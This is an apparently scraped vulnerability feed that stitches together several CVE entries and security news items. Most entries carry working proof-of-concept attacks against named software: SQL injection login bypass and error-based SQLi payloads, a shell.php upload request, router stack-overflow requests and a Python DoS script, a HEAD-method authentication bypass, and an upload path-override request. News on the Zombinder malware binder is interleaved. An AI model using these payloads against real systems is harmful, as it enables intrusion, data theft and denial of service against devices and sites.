Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

An arbitrary file upload vulnerability in /queuing/admin/ajax.php?action=save_settings of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Dynamic Transaction Queuing System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: ATKF

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin123 (Super Admin account)

Vulnerability url: ip/queuing/admin/ajax.php?action=save\_settings

Loophole location: Dynamic Transaction Queuing System's "/queuing/admin/ajax.php?action=save\_settings" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /queuing/admin/ajax.php?action\=save\_settings HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/queuing/admin/index.php?page=site\_settings
Content-Length: 603
Content-Type: multipart/form-data; boundary=---------------------------62511349610243
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
\-----------------------------62511349610243
Content-Disposition: form-data; name="name"
admin
\-----------------------------62511349610243
Content-Disposition: form-data; name="email"
1@qq.com
\-----------------------------62511349610243
Content-Disposition: form-data; name="contact"
11
\-----------------------------62511349610243
Content-Disposition: form-data; name="about"
\-----------------------------62511349610243
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: image/jpeg
<?php phpinfo(); ?>
\-----------------------------62511349610243--

The files will be uploaded to this directory \\queuing\\admin\\assets\\img  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45275: bug_report/RCE-1.md at main · ATKF/bug_report

Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set .

**Vulnerability description**

Affect device：Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability cause**

In the /goform/fast\_setting\_wifi\_set interface, the ssid parameter and the sprintf function passed through it do not limit the length, which will cause stack overflow and achieve the effect of a DoS denial of service attack.

**POC**

Poc of Denial of Service(DoS):

POST /goform/fast\_setting\_wifi\_set HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 10
Origin: http://192.168.0.1
Connection: close
Cookie: password=xxxxxxxxxx
Referer: http://192.168.0.1/main.html

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+1000\*a

CVE-2022-45979: IOT-CVE/Tenda/AX12/4 at master · The-Itach1/IOT-CVE

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 is vulnerable to remote stack buffer overflow.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

CVE-2022-45957: ZTE ZXHN-H108NS Stack Buffer Overflow

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

CVE-2022-45957: ZTE ZXHN-H108NS Authentication Bypass ≈ Packet Storm

Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one).

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can upload any file to any folder (even a password protected one)

Reproduction：

*   Login as a user who only have the right to upload file

*   You can see that the /testPasswd folder is password protected

*   Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package

!\[image\](https://user-images.githubusercontent.com/52377340/203211925-7ac5b6b8-78e4-4981-bf06-9452fa653e5f.png)

*   Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet  
    
*   Enter the password into the folder to find the file uploaded successfully
    

**Reproduction / 复现链接**

Package：

PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.31.148:52000/test  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4  
Content-Type: application/octet-stream  
**File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3**  
As-Task: false  
Content-Length: 55875  
Origin: http://192.168.31.148:52000  
Connection: close

�PNG  
�

**Logs / 日志**

_No response_

CVE-2022-45968: Upload files to the directory with password Vulnerability（bypass） · Issue #2444 · alist-org/alist

By Deeba Ahmed
At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services.
This is a post from HackRead.com Read the original post: Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ThreatFabric’s security researchers have reported a new **dark web** platform through which cybercriminals can easily add malware to legitimate Android applications.

Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of **Windows and Android malware**, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called **InTheBox** surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.

According to ThreatFabric’s **blog post**, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.

**What does Zombinder Do?**

In the campaign detected by ThreatFabric’s researchers, the service is distributing the **Xenomorph banking malware** disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.

At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded **the infected Windows app** were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that two downloaded buttons on the malicious website’s landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the **Ermac malware**.

**How to Stay Protected?**

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

1.  **Psst! tool lets users share passwords using a link**
2.  **Chinese Hackers Hiding Malware in Windows Logo**
3.  **Trojan Source attack lets hackers exploit source code**
4.  **Android apps on Play Store infected with Windows malware**
5.  **Spyware Vendor Exploited Chrome, Firefox and Windows 0-days**

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 2 and Dec. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 2 to December 9

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /services/view_service.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: DaLao

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/services/view\_service.php?id=

Vulnerability location: /asms/admin/services/view\_service.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/services/view\_service.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/services/view\_service.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44838: bug_report/SQLi-1.md at main · GkaMei/bug_report

Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.

Tag

#firefox